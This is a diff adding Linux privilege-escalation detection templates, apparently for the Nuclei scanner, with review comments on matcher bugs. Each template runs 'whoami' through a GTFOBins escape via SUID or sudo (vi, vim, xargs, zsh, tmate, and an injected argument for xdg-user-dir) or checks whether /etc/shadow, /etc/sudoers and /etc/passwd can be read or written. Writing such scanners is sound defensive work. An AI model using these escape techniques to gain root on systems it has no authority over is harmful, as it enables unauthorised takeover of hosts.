--- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-time.yaml 
@@ -0,0 +1,46 @@
+id: privilege-escalation-time
+
+info:
+ name: Time - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/time/
+ metadata:
+ verified: true
+ tags: code,linux,time,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ time whoami
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo time whoami
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml
new file mode 100644
index 0000000000..32a3ff94b0
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-timeout
+
+info:
+ name: Timeout - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/timeout/
+ metadata:
+ verified: true
+ tags: code,linux,timeout,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ timeout 7d whoami
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo timeout 7d whoami
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml
new file mode 100644
index 0000000000..f74b782e9f
--- /dev/null
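Review bot: In the time hunk the SUID step `time whoami` is resolved by the shell before any binary is looked up: `time` is a reserved word in bash, so whenever the selected engine is bash (or `sh` is bash, as on several distributions) the step measures the shell's own `whoami` and the SUID `/usr/bin/time` binary is never exercised, giving a false negative for exactly the condition the template is meant to detect. Forcing the external program, `command time whoami` or the explicit `/usr/bin/time whoami`, makes the check independent of which engine nuclei picks; the sudo step is unaffected because sudo executes the binary directly. Since `time` also writes its timing summary to stderr, a whole-line match on "root" rather than a substring check is what keeps that output from influencing the result.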
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-tmate
+
+info:
+ name: tmate - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/tmate/
+ metadata:
+ verified: true
+ tags: code,linux,tmate,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ tmate -c whoami
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo tmate -c whoami
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml
new file mode 100644
index 0000000000..775ce61fd3
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-torify
+
+info:
+ name: Torify - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/torify/
+ metadata:
+ verified: true
+ tags: code,linux,torify,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ torify whoami
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo torify whoami
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml
new file mode 100644
index 0000000000..f1f1bd496b
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-torsocks
+
+info:
+ name: Torsocks - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/torsocks/
+ metadata:
+ verified: true
+ tags: code,linux,torsocks,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ torsocks whoami
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo torsocks whoami
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml
new file mode 100644
index 0000000000..8c81840d2d
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-unshare
+
+info:
+ name: Unshare - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/unshare/
+ metadata:
+ verified: true
+ tags: code,linux,unshare,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ unshare whoami
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo unshare whoami
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml
new file mode 100644
index 0000000000..07f5af0cc1
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-vi
+
+info:
+ name: Vi - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/vi/
+ metadata:
+ verified: true
+ tags: code,linux,vi,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ vi -c '!whoami'
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo vi -c '!whoami'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-view.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-view.yaml
new file mode 100644
index 0000000000..acc083f434
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-view.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-view
+
+info:
+ name: View - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/view/
+ metadata:
+ verified: true
+ tags: code,linux,view,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ view -c ':!whoami'
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo view -c ':!whoami'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml
new file mode 100644
index 0000000000..f719a656ea
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-vim
+
+info:
+ name: Vim - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/vim/
+ metadata:
+ verified: true
+ tags: code,linux,vim,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ vim -c '!whoami'
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo vim -c '!whoami'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml
new file mode 100644
index 0000000000..4398b539f9
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-xargs
+
+info:
+ name: Xargs - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/xargs/
+ metadata:
+ verified: true
+ tags: code,linux,xargs,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ xargs -a /dev/null whoami
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo xargs -a /dev/null whoami
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml
new file mode 100644
index 0000000000..59238e7bbb
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-xdg-user-dir
+
+info:
+ name: xdg-user-dir - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/xdg-user-dir/
+ metadata:
+ verified: true
+ tags: code,linux,xdg-user-dir,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ xdg-user-dir '}; whoami #'
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo xdg-user-dir '}; whoami #'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml
new file mode 100644
index 0000000000..ec4a5e0742
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-yash
+
+info:
+ name: Yash - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/yash/
+ metadata:
+ verified: true
+ tags: code,linux,yash,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ yash -c 'whoami'
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo yash -c 'whoami'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml
new file mode 100644
index 0000000000..d5b428b099
--- /dev/null
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml
@@ -0,0 +1,46 @@
+id: privilege-escalation-zsh
+
+info:
+ name: Zsh - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference: https://gtfobins.github.io/gtfobins/zsh/
+ metadata:
+ verified: true
+ tags: code,linux,zsh,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ #SUID
+ - engine:
+ - sh
+ - bash
+ source: |
+ zsh -c 'whoami'
+
+ #SUDO
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo zsh -c 'whoami'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: dsl
+ dsl:
+ - 'contains(code_2_response, "root")'
+ - 'contains(code_3_response, "root")'
+ condition: or
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/readable-writable-etc-shadow.yaml b/code/privilege-escalation/linux/readable-writable-etc-shadow.yaml
new file mode 100644
index 0000000000..ef35c08596
--- /dev/null
+++ b/code/privilege-escalation/linux/readable-writable-etc-shadow.yaml
@@ -0,0 +1,43 @@
+id: readable-writable-etc-shadow
+
+info:
+ name: /etc/shadow writable or readabel - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference:
+ - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
+ metadata:
+ verified: true
+ tags: code,linux,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ [ -r "/etc/shadow" ] || [ -w "/etc/shadow" ] && echo "Either readable or writable" || echo "Not readable and not writable"
+
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: word
+ part: code_2_response
+ words:
+ - "Either readable or writable"
+
+ - type: word
+ part: code_2_response
+ words:
+ - "Not readable and not writable"
+ negative: true
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml b/code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml
new file mode 100644
index 0000000000..6a5f3846f8
--- /dev/null
+++ b/code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml
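Review bot: The three matchers in the shadow hunk have no `matchers-condition`, and the default for that key is `or`, so the negative `"root"` word matcher on `code_1_response` alone satisfies the template for every non-root user and /etc/shadow is reported as readable or writable no matter what the second command printed; the GTFOBins templates earlier in this diff set `matchers-condition: and` explicitly, and this hunk needs the same line directly before `matchers:`. The readable-writable-etc-sudoers hunk on the next line has the identical gap. The shell test `[ -r ... ] || [ -w ... ] && echo A || echo B` does work only because sh chains `||` and `&&` left to right with equal precedence, which is easy to misread; `if [ -r /etc/shadow ] || [ -w /etc/shadow ]; then echo "Either readable or writable"; else echo "Not readable and not writable"; fi` states the intent without relying on that rule. The info.name also misspells "readable" as "readabel", and neither hunk carries an info.description — a sentence noting that a readable /etc/shadow exposes password hashes and a writable one lets the root password be changed is what justifies severity high to a triager.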
@@ -0,0 +1,43 @@
+id: readable-writable-etc-sudoers
+
+info:
+ name: /etc/sudoers writable or readable - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference:
+ - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#etc-sudoers-etc-sudoers.d
+ metadata:
+ verified: true
+ tags: code,linux,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ whoami
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ [ -r "/etc/sudoers" ] || [ -w "/etc/sudoers" ] && echo "Either readable or writable" || echo "Not readable and not writable"
+
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "root"
+ negative: true
+
+ - type: word
+ part: code_2_response
+ words:
+ - "Either readable or writable"
+
+ - type: word
+ part: code_2_response
+ words:
+ - "Not readable and not writable"
+ negative: true
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/sudo-nopasswd.yaml b/code/privilege-escalation/linux/sudo-nopasswd.yaml
new file mode 100644
index 0000000000..a5dd48786b
--- /dev/null
+++ b/code/privilege-escalation/linux/sudo-nopasswd.yaml
@@ -0,0 +1,26 @@
+id: sudo-nopasswd
+
+info:
+ name: Sudo NOPASSWD - Privilege Escalation
+ author: daffainfo
+ severity: high
+ description: Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password.
+ reference:
+ - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#nopasswd
+ metadata:
+ verified: true
+ tags: code,linux,sudo,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ sudo -l
+
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "(root) NOPASSWD:"
\ No newline at end of file
diff --git a/code/privilege-escalation/linux/writable-etc-passwd.yaml b/code/privilege-escalation/linux/writable-etc-passwd.yaml
new file mode 100644
index 0000000000..0f0d42cf42
--- /dev/null
+++ b/code/privilege-escalation/linux/writable-etc-passwd.yaml
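Review bot: The word matcher `"(root) NOPASSWD:"` in the sudo-nopasswd hunk only recognises rules whose runas list is spelled exactly `(root)`; the more common sudoers spellings `(ALL) NOPASSWD:` and `(ALL : ALL) NOPASSWD:` grant the same passwordless root path and currently produce no finding, so the check under-reports the misconfiguration it is named for. A regex matcher, `- type: regex` with `part: code_1_response` and `regex: ['\(\s*(root|ALL)(\s*:\s*\w+)?\s*\)\s*NOPASSWD:']`, covers those forms in one entry. `sudo -l` can itself prompt for a password (sudoers `listpw` defaults to `any`, so only a user who already holds a NOPASSWD entry is exempt), which means a scan over ordinary accounts may block on the prompt when a TTY is attached; `sudo -n -l` fails fast instead and is the form the other templates should use as well. The description present here is the one piece of documentation the sibling templates in this diff lack, and it would be worth carrying the same pattern over to them.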
@@ -0,0 +1,31 @@
+id: writable-etc-passwd
+
+info:
+ name: /etc/passwd writable - Privilege Escalation
+ author: daffainfo
+ severity: high
+ reference:
+ - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-passwd
+ metadata:
+ verified: true
+ tags: code,linux,privesc
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ [ -w "/etc/passwd" ] && echo "Writable" || echo "Not writable"
+
+ matchers:
+ - type: word
+ part: code_1_response
+ words:
+ - "Writable"
+
+ - type: word
+ part: code_1_response
+ words:
+ - "Not writable"
+ negative: true
\ No newline at end of file
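Review bot: The writable-etc-passwd hunk omits the `whoami` guard that every sibling template in this diff uses, so a scan executed as root always finds /etc/passwd writable and raises a privilege-escalation finding against a host with nothing wrong. Adding the same first step with the negative `"root"` word matcher on `code_1_response`, plus an explicit `matchers-condition: and`, makes it behave like readable-writable-etc-shadow; note that inserting the step renumbers the existing matchers to `code_2_response`. The two current matchers only pass under the default `or` because capital-W `"Writable"` happens not to be a substring of "Not writable", and an explicit `and` removes that dependence on letter case. An info.description is also missing; one sentence stating that a writable /etc/passwd lets a local user alter account definitions, including root's, would give the finding its context.
```yaml
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  # … unchanged: the [ -w "/etc/passwd" ] step, now reported as code_2_response …

  matchers-condition: and
  matchers:
    - type: word
      part: code_1_response
      words:
        - "root"
      negative: true

    - type: word
      part: code_2_response
      words:
        - "Writable"

  # … unchanged: the negative "Not writable" matcher, now on code_2_response …
```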